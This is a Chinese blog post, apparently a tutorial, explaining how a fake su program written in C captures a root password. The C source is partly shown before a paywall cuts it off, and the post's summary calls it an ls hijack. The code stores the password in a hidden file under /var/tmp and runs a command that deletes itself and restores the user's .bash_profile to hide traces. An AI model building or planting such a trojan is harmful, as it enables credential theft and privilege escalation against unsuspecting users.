本文介绍了如何通过劫持ls命令来记录root密码。当root用户执行ls时,密码会被写入指定文件。这种方法利用了命令劫持的思路,模拟正常登录过程并记录敏感信息。虽然例子简单,但提示了在安全防护上要注意避免此类陷阱。
今天学习的时候看到了一个通过劫持su命令获取root密码的例子,我稍稍做一下解释,代码如下:
/*
* kpr-fakesu.c V0.9beta167 ;P
* by koper <koper@linuxmail.org>
*
* /bin/su sends various failure information depending on the OS ver.
* Please modify the source to make it "fit" ;)
*
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[]){
FILE *fp;
char *user;
char *pass;
char filex[100];
char clean[100];
sprintf(filex,"/var/tmp/.pwds"); //保存命令 存储密码的文件位置
sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/whyx/.wgetrc /home/whyx/.bash_profile");
// 修改 /home/XXX 为用户的目录 还原用户环境变量文件
if(argc==1) user="root"; 
最低0.47元/天 解锁文章
扫一扫
380
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
